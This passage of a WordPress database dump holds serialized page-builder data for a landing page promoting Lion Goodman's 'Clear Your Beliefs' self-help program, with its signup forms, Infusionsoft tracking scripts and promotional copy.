font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1161:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"</div>\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1303, 1764, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:233:"<center>\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2022:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1161:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"</div>\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1305, 1766, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2022:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1184:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top:-10px !important; width:100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"</div>\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t 